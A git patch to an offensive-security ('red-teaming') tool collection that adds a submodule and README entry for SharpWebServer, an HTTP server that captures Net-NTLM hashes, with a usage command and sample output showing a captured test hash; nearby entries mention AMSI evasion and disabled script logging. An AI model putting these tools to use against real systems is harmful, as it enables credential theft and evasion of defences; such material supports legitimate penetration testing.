From b4aa1ec24ef16405941fa10722d984b2e6df94bc Mon Sep 17 00:00:00 2001 From: "Mariusz B. / mgeeky" Date: Mon, 29 Mar 2021 18:08:09 +0200 Subject: [PATCH] Added SharpWebServer --- .gitmodules | 3 +++ red-teaming/README.md | 25 +++++++++++++++++++++++++ red-teaming/SharpWebServer | 1 + 3 files changed, 29 insertions(+) create mode 160000 red-teaming/SharpWebServer diff --git a/.gitmodules b/.gitmodules index 86efee1..06c8365 100644 --- a/.gitmodules +++ b/.gitmodules @@ -52,3 +52,6 @@ [submodule "red-teaming/CobaltSplunk"] path = red-teaming/CobaltSplunk url = https://github.com/mgeeky/CobaltSplunk +[submodule "red-teaming/SharpWebServer"] + path = red-teaming/SharpWebServer + url = https://github.com/mgeeky/SharpWebServer diff --git a/red-teaming/README.md b/red-teaming/README.md index 4112540..ba8bf03 100755 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -340,6 +340,31 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt - **`set-handler.rc`** - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. ([gist](https://gist.github.com/mgeeky/bf4d732aa6e602ca9b77d089fd3ea7c9)) +- [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality + +``` +C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true + + :: SharpWebServer :: + a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality + +[.] Serving HTTP server on port : 8888 +[.] Will run for this long : 60 seconds +[.] Verbose mode turned on. +[.] NTLM mode turned on. +[.] Serving files from directory : C:\Windows\Temp + +SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized due to lack of Authorization header. +SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401) +SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized with NTLM Challenge Response. +SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401) + +[+] SharpWebServer: Net-NTLM hash captured: +TestUser:::1122334455667788:66303EE2DF9417E2FE07E1B7FD663205:010100000000000092EC04E8B324D701C2B561D5FECBB325000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000010000000020000045E18A336DA58F5F0F826F846C699F77DCCF02BA5135525AC52EFBB0C0A1F1160A0010000000000000000000000000000000000009001C0048005400540050002F006C006F00630061006C0068006F00730074000000000000000000 + +SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200) +``` + - [**`SharpWMI`**](https://github.com/mgeeky/SharpWMI) - This implementation is a refurbished and enhanced version of original SharpWMI by @harmj0y that adds some more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI and makes it possible to return output from WMI remotely executed commands. Initially submitted as a [Pull Request #3](https://github.com/GhostPack/SharpWMI/pull/3) to the original repo of that project, however unless it's merged there - will pin my fork here for accountability - **`Stracciatella`** - Powershell runspace from within C# (aka `SharpPick` technique) with AMSI and Script Block Logging disabled for your pleasure. diff --git a/red-teaming/SharpWebServer b/red-teaming/SharpWebServer new file mode 160000 index 0000000..8346f4b --- /dev/null +++ b/red-teaming/SharpWebServer @@ -0,0 +1 @@ +Subproject commit 8346f4bc38d53467498ec47f123b98258cb297e0